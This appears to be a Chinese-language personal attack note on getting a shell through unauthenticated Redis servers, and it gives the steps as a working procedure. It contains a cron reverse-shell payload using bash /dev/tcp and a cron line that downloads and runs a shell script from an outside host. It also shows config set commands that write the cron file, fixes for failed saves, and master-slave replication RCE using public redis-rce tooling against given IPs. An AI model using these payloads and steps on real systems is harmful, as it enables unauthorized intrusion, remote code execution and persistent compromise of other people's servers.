简介：

Redis是一个开源的使用ANSI C语言编写、
支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，

并提供多种语言的API。
作为一个高性能的key-value数据库，
Redis在部分场景下对关系数据库起到很好的补充作用。

任务 getshell

 E:\hack\envir\redis>redis-cli -h 120.xx.xx.4

rdm客户端 — info 打印 一下 未授权 Linux服务器

 set  xx   "\n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n"


 
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
 
 

tw:0>config set dir /var/spool/cron/
"ERR Changing directory: No such file or directory"


尝试其他办法

tw2:0>config set dir /var/spool/cron/
"OK"


tw2:0>tw2:0>config set dbfilename root
"OK"


save

140.112.90.153:6379> save
(error) ERR


原因分析：
启动redis-server服务时，没有root权限

解决方案：
sudo kill -9 pid     #将redis服务杀掉
sudo redis-server ***/redis.config	 #sudo使用root权限启动

主从复制 getshell

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入

make

会生成moudle.so 文件

 # cp /home/amingmm/RedisModules-ExecuteCommand/module.so /home/amingmm/RedisModules-ExecuteCommand/redis-rce

把生成的moudle.so复制到redis-rce目录里面，之后进入redis-rce目录里面输入

 python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so